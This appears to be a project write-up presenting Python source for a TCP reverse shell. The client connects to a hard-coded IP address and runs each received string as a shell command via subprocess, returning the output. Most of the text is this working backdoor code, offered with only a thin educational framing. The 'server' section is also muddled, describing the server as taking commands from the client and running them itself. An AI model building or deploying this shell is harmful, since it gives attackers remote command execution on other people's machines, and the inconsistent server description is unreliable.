Project Overview
Implements a TCP-based reverse shell allowing remote command execution on the client's machine, illustrating raw socket handling, subprocess control, and directory navigation.
Server Implementation
The server sets up a listener socket:
def createSocket():
global s, host, port
host = ''
port = 9999
s = socket.socket()
After binding and listening, it accepts incoming clients and forwards them to socketAccept() for command dispatch.
Once connected, it waits for commands from the client:
data = s.recv(1024)
if data[:2].decode() == 'cd':
os.chdir(data[3:].decode())
if len(data) > 0:
cmd = subprocess.Popen(data.decode(), shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
output = cmd.stdout.read() + cmd.stderr.read()
s.send(str.encode(output.decode() + os.getcwd() + '> '))
Commands are executed via subprocess.Popen, and combined stdout/stderr is sent back along with the updated working directory.
Client Implementation
The client initiates the reverse connection:
s = socket.socket()
host = '10.48.64.73'
port = 9999
s.connect((host, port))
It enters a loop receiving commands from the server and executing them locally:
while True:
data = s.recv(1024)
if data[:2].decode() == 'cd':
os.chdir(data[3:].decode())
if data:
proc = subprocess.Popen(data.decode(), shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
out = proc.stdout.read() + proc.stderr.read()
s.send(str.encode(out.decode() + os.getcwd() + '> '))
print(out.decode(), end='')
Key Takeaways
- Bi-directional command/control over raw TCP sockets.
- Subprocess management for remote shell execution.
- Dynamic working directory handling via remote
cdcommands.